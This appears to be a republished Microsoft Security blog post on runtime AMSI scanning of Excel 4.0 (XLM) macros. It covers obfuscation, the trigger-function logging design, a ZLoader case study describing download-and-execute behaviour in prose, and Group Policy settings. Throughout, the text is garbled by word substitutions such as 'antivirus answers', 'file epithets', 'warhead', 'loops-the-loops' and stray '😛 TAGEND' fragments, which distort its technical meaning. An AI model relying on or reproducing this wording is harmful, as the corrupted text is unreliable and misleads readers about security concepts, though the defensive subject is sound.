We have recently expanded the integration of Antimalware Scan Interface( AMSI) with Office 365 to include the runtime scanning of Excel 4.0( XLM) macros, to help antivirus answers tackle the increase in attacks that use malicious XLM macros. This integration, an example of the many security features released for Microsoft 365 Apps on a regular basis, indicates our commitment to continuously increase protection for Microsoft 365 customers against the latest threats.

Microsoft Defender Antivirus is using this integration to detect and block XLM-based malware, and we are in favour of other antivirus products to use this open interface to gain better visibility and improve protections against these threats.

XLM macros is a legacy macro language that was made available to Microsoft Excel in 1992, before the introduction of Visual Basic for Applications( VBA) in 1993. While more rudimentary than VBA, XLM is powerful enough to provide interoperability with the operating system, and many organizations and users continue to use its functionality for legitimate purposes. Cybercriminals know this, and they have been abusing XLM macros, increasingly more often, to call Win3 2 APIs and operate shell commands.

The AMSI instrumentation for VBA has been furnishing deep visibility into the runtime behavior of VBA macros. Its liberate in 2018 effectively removed the armor that macro-obfuscation equipped malware with, uncovering malicious code to improved levels of scrutiny. Naturally, threat performers like those behind Trickbot, Zloader, and Ursnif have appeared elsewhere for features to abuse and operate under the radar of security answers, and they found a suitable alternative in XLM.

Like VBA and many other scripting languages abused by malware, XLM code can be obfuscated relatively easily to conceal the real intent of the macro. For example, attackers can disguise URLs or file epithets of executable files from static inspection through simple strings manipulations. Attackers also take advantage of the route macro code persists within the Excel document–while VBA macros are stored in a dedicated OLE stream( and hence can be easily situated and extracted ), XLM macros do not exist as a separate, well-defined entity. Rather, each XLM macro statement is a formula within a cell. Extracting a whole XLM macro can become a cumbersome task, necessitating a cell-by-cell inspection of the whole document.

Screenshot of Microsoft Excel file with malicious XLM macros

Figure 1. Sample malicious XLM macro

In addition, while formulae are typically executed downwards starting from the top, with XLM the macro content can be quite spread out, thanks to control flow statements like RUN, CALL, or GOTO, which permit the switching of execution flowing from one column to another. This feature, together with obfuscation, has been abused by attackers to craft documents that could evade static analysis.

AMSI instrumentation for Excel 4.0( XLM) macros

AMSI is an open interface that allows any application to request the scan of any data at any time. In a nutshell, this technology renders applications the capability to interface with the installed antivirus answer in order to inspect and scan potentially dangerous data( e.g ., a file downloaded from a remote location, or data generated dynamically by an application ). Microsoft already utilizes information and communication technologies in various applications to detect malicious macros, script-based malware, and other threats 😛 TAGEND

Office VBA macros JScript VBScript PowerShell WMI Dynamically loaded. NET assemblies MSHTA/Jscript9

The data provided by AMSI is leveraged extensively by Microsoft Defender for Endpoint. It renders important data for machine learning simulates that process millions of signals every day to identify and block malicious behaviors. The XLM instrumentation is similar to the implementation in VBA and other scripting engines that incorporated within AMSI 😛 TAGEND

Diagram representation of AMSI instrumentation for XLM

Figure 2. AMSI instrumentation for XLM

The XLM language permits a user to write programs that call native runtime functions, as well as external Win3 2 APIs. In both cases, the interfaces that dispatch the calls to these functions are intercepted and directed to an internal logger. The logger component stores the intercepted functions in text format within a circular buffer. When certain dangerous parts are called, for example the runtime part EXEC or the Win3 2 API ShellExecute, XLM haltings the macro execution and invokes AMSI to request a synchronous scan of the circular buffer containing the parts logged up to that phase. Such dangerous functions are called “trigger functions”. If the antivirus recognizes the macro as malware, the purpose of implementing the macro is aborted and Excel is safely terminated, blocking the attack and avoiding the malicious macro from doing any damage. Otherwise, the user experience continues seamlessly.

It’s important to observe that the interception of XLM function calls happens at runtime. This means that the logger component always registers the true behavior of all functions and associated parameters, which may contain URLs, file names, and other important IOCs, irrespective of the obfuscation used by the malware.

The following is an example of an XLM macro found in a malicious record 😛 TAGEND

Screenshot of XLM macro

Figure 3. Sample XLM macro

This malicious macro consists of a series of commands( e.g ., RUN, REGISTER, IF, etc .) with related parameters specified by references to other cells. For instance, the token$ CA $1889 passed to the first role RUN indicates that the string provided as parameter for this function is in the cell at column CA and row 1889.

This is only one of the many routes that XLM-based malware can obfuscate code. Detecting this macro is challenging because it doesn’t expose any suspicious strings or behavior. This is where the power of AMSI comes into play: the instrumentation lets XLM to inspect parts when they are invoked, so that all their parameters have already been de-obfuscated. As a ensue, the above macro produces a log that was like the following 😛 TAGEND

Sample log produced when XLM macro is run

Figure 4. Sample log

The XLM engine determines that the dangerous function ShellExecuteA is being invoked, and subsequently places the macro execution on hold and passes the macro behavioral log to AMSI for scanning. The antivirus now has visibility into a behavioral log that entirely exposes all of the data including, API names, URLs, and file epithets. The log attains it easy to conclude that this macro is trying to download and execute a DLL payload via the tool Rundll3 2.

Case study: ZLoader campaign

ZLoader is a malware family that has are active in perpetrating financial steal for several years. Like many of its peers, ZLoader operates via aggressive campaigns that rely on social engineering and the abuse of Office documents spread via email.

We have been monitoring the activity of this menace and observed that in the last year the attackers shifted to XLM as their infection vector of choice. The Excel documents have a typical lure message to trick the user into clicking “Enable Content” to allow the macro code to run.

Screenshot of malicious Excel file used in Zloader campaign

Figure 5. Malicious Excel file used in Zloader campaign

A closer look at the document uncovers an Excel sheet with an obscure-looking name. That sheet embeds XLM macro formulas, who the hell is stored several rows down to induce the sheet appear empty. Furthermore, the macro formulas are spread out and obfuscated, impeding static analysis and raising more challenges for identifying intent.

Screenshot of XLM macro used in Zloader campaign

Figure 6. Malicious XLM macro used in ZLoader campaign

Executing and debugging the macro with Excel is not very straightforward either. The macro has long loops-the-loops that are used to decode and run further obfuscated macro formulae, and the Excel’s debugger doesn’t have the ability to control the execution in a granular style in order to skip loops-the-loops and transgress on specific formulas.

However, when this macro runs with the AMSI instrumentation enabled, it produces up to three different logs that are passed to AMSI. The first two look like the following 😛 TAGEND

Screenshot of log produced when XLM macro used in Zloader campaign is run

Figure 7. Log made when ZLoader’s XLM macro is run

The image simply shows the final part of the log where the interesting activity shows up. We can see that the macro is issuing a new EXEC statement to run a. vbs file via explorer.exe. This EXEC statement causes the execution of the VBScript named EW2H. vbs, which has been decoded and saved to disk by the macro prior to the EXEC line. The VBScript then tries to download and operate a binary payload. The macro attempts to do this twice, hence this log( with minor changes) is passed to AMSI twice.

If the above steps fail, the macro resorts to downloading the payload directly, producing the following log for AMSI 😛 TAGEND

Screenshot of log produced when XLM macro used in Zloader campaign is run

Figure 8. Log created when ZLoader’s XLM macro is run

The macro defines two URLs, then downloads their contents with the API URLDownloadToFileA, and finally invokes the API ShellExecuteA to launch the downloaded payload( the file jxi0 9. txt) via rundll3 2. exe. We can extrapolate from this line that the warhead is a DLL.

All three logs give plenty of opportunities to detect malicious behavior and also permit the easy extraction of relevant IOCs like URLs, file epithets, etc. The initial XLM code in the Excel document is completely obfuscated and contains no usable information, inducing it tricky to issue static detectings that are both effective and durable. With the dynamic nature of AMSI, the runtime behaviour can be observed in cleartext, even with obfuscation. Detectings based on the logs passed to AMSI likewise have the advantage of being more robust and generic in nature.


Runtime inspection of XLM macros is now available in Microsoft Excel and can be used by antivirus solutions like Microsoft Defender Antivirus that are registered as an AMSI provider on the machine. This feature is included as an addition to the existing AMSI integration with Office. It’s enabled by default on the February Current Channel and Monthly Enterprise Channel for Microsoft 365 subscription users.

In its default configuration, XLM macros are scanned at runtime via AMSI, except in the following scenarios 😛 TAGEND

Files opened while macro security decideds are set to “Enable all macrosFiles opened from a trusted location Files that are trusted documents

Administrators can now use the existing Microsoft 365 applications policy control to configure when both XLM and VBA macros are scanned at runtime via AMSI. Get the latest group policy template files.

Group Policy decided epithet Macro Runtime Scan Scope

Path User Configuration> Administrative templates> Microsoft Office 2016> Security Settings

This policy defining specifies the behaviour for both the VBA and Excel 4.0( XLM) runtime scan features. Multiple Office apps assistance VBA macros, but XLM macros are only supported by Excel. Macros can only be scanned if the antivirus software registers as an Antimalware Scan Interface( AMSI) provider on the device.

If you enable this policy setting, you can choose from the following options to determine the macro runtime scanning behavior 😛 TAGEND

Disable for all files( not recommended ): If you choose this option , no runtime scanning of enabled macros will be performed.

Enable for low trust files: If you choose this option, runtime scanning will be enabled for all files for which macros are enabled, except for the following files 😛 TAGEND

Files opened while macro security specifies are set to “Enable all macrosFiles opened from a trusted place Files that are Trusted Documents Files that contain VBA that is digitally signed by a trusted publisher

Enable for all files: If you choose this option, then low trust files are not excluded from runtime scanning. The VBA and XLM runtimes report to an antivirus system certain high-risk code behaviours the macro is about to execute. This allows the antivirus system to indicate whether or not the macro behaviour is malicious. If the behavior is determined to be malicious, the Office application closes the session and the antivirus system can quarantine the file. If the behavior is non-malicious, the macro execution proceeds.

Note: When macro runtime scanning is enabled, the runtime performance of affected VBA projects and XLM sheets may be reduced.

If you disable this policy setting , no runtime scanning of enabled macros will be performed.

If you don’t configure this policy setting, “Enable for low trust files” will be the default setting.

Note: This policy defining only applies to subscription versions of Office, such as Microsoft 365 Apps for endeavor.

AMSI improves security for all

AMSI offer deep and dynamic visibility into the runtime behaviors of macros and other scripts to expose threats that hide malicious intent behind obfuscation, junk control flow statements, and many other tricks. Microsoft Defender Antivirus, the built-in antivirus answer on Windows 10, has been leveraging AMSI to uncover a wide range of threats, from common malware to sophisticated attempts. The recent AMSI instrumentation in XLM directly tackles the rise of malware campaigns that mistreat this feature. Because AMSI is an open interface, other antivirus answers can leverage the same visibility to improve protections against menaces. Security dealers can learn how to leverage AMSI in their antivirus products here.

At Microsoft, we take full advantage of signals from AMSI. The data generated by AMSI is not only useful for immediate patron antimalware detections, but also provides rich signals for Microsoft Defender for Endpoint. In our blog post about AMSI for VBA, we described how these signals are ingested by multiple layers of cloud-based machine learning classifiers and are working in partnership with all other signals. The outcome is an enhanced protection layer that learns to recognize and block new and unknown menaces in real-time.

Figure 9. Example of detecting from Microsoft Defender Antivirus based on data inspected by AMSI

Figure 10: Notification from Microsoft Excel after AMSI reported malware detection

Figure 11: Example of Microsoft Defender for Endpoint alert for detection of XLM malware

The visibility provided by AMSI leads to significant improvements in generic and resilient signatures that can stop waves of obfuscated and mutated variants of threats. AMSI-driven protection is in addition to an extensive multi-layer protection stack in Microsoft Defender for Endpoint, which also includes attack surface reduction, network protection, behavior monitoring and other engineerings that protect against macro malware and other similar script-based threats.

The AMSI-enriched visibility to be submitted by Microsoft Defender for Endpoint is further amplified across Microsoft 365 Defender, such that XLM macro menaces are detected and blocked on various enter vectors. The orchestration of signal-sharing and coordinated defense in Microsoft 365 work towards ensuring that, for example, Microsoft Defender for Office 365 blocks macro malware distributed via email, which is the most common delivery methods for these threats.

Learn how you can stop strikes through automated, cross-domain security and built-in AI with Microsoft Defender 365.

Giulia Biagini, Office 365 Threat Research Team

Auston Wallace, Microsoft 365 Security Team

Andrea Lelli, Microsoft 365 Defender Research Team

The post XLM+ AMSI: New runtime defense against Excel 4.0 macro malware appeared first on Microsoft Security .

Read more: microsoft.com